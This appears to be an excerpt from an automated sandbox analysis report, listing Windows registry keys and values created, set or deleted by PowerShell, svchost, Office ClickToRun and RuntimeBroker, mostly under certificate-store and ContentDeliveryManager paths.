Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={D7E9F11A-84D7-47FC-A902-949C8C009CC0}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\07406c0d-b3a4-4daa C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c2df8f22-48ef-47b5 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\124f038e-c3b3-41e9 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\82dcc277-57ed-4d1d C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\83c78cfc-b9d3-4552 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9c63b2d5-91d3-4cc1 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\83c78cfc-b9d3-4552 = (binary data omitted) C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b72e70e0-1598-4afa C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9ae09148-a8e8-4149 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9ae09148-a8e8-4149 = "\\\\?\\Volume{FA3589B5-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\c6e97c8ac3a0bbd5c26aaead5f642717b8fe81c75c9ddd5649a6aff8dde7ac80" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\83c78cfc-b9d3-4552 = cadc864077eeda01 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\136bdf30-4153-4fb9 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d0bc8fc0-9270-4118 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\82dcc277-57ed-4d1d = ac02163e77eeda01 C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\da464137-eca9-4001 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d0bc8fc0-9270-4118 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c2df8f22-48ef-47b5 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\58231882-a9e2-4444 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\124f038e-c3b3-41e9 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b72e70e0-1598-4afa = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b72e70e0-1598-4afa = (binary data omitted) C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\83c78cfc-b9d3-4552 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b72e70e0-1598-4afa = 8d78d53a77eeda01 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9c63b2d5-91d3-4cc1 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9ae09148-a8e8-4149 = (binary data omitted) C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\82dcc277-57ed-4d1d C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\82dcc277-57ed-4d1d = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9c63b2d5-91d3-4cc1 = f062923b77eeda01 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\07406c0d-b3a4-4daa = "\\\\?\\Volume{FA3589B5-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\01645f476675b13f39be10f3ee02455857fa8529cc7dd64406614cb991d65812" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d0bc8fc0-9270-4118 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b72e70e0-1598-4afa = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9c63b2d5-91d3-4cc1 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9ae09148-a8e8-4149 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\07406c0d-b3a4-4daa = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d0bc8fc0-9270-4118 = a8953d3977eeda01 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7468b921-5880-43e0 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7468b921-5880-43e0 = (binary data omitted) C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\124f038e-c3b3-41e9 = "\\\\?\\Volume{FA3589B5-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\9c8d44b2c17e077f30393d18f61ee0d6e5a1abd7614cc5d97693f62a07748be9" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9c63b2d5-91d3-4cc1 = "\\\\?\\Volume{FA3589B5-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\01645f476675b13f39be10f3ee02455857fa8529cc7dd64406614cb991d65812" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9ae09148-a8e8-4149 = ee70813c77eeda01 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d0bc8fc0-9270-4118 C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a07fe9ed-6821-4ab3 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\124f038e-c3b3-41e9 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c2df8f22-48ef-47b5 = 4502433977eeda01 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\136bdf30-4153-4fb9 = "\\\\?\\Volume{FA3589B5-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\c6e97c8ac3a0bbd5c26aaead5f642717b8fe81c75c9ddd5649a6aff8dde7ac80" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\58231882-a9e2-4444 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\83c78cfc-b9d3-4552 = "\\\\?\\Volume{FA3589B5-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\c589e687ebfb4c4b2ef06477eba041458444ffbf17c18fd792e7f8052dbf911b" C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\36298bd8-9e07-4f2a C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\008b28ae-f18b-4a8d C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\58231882-a9e2-4444 = f0244f3977eeda01 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\58231882-a9e2-4444 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b72e70e0-1598-4afa C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9ae09148-a8e8-4149 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\07406c0d-b3a4-4daa C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7468b921-5880-43e0 = 4c89393977eeda01 C:\Windows\System32\RuntimeBroker.exe N/A
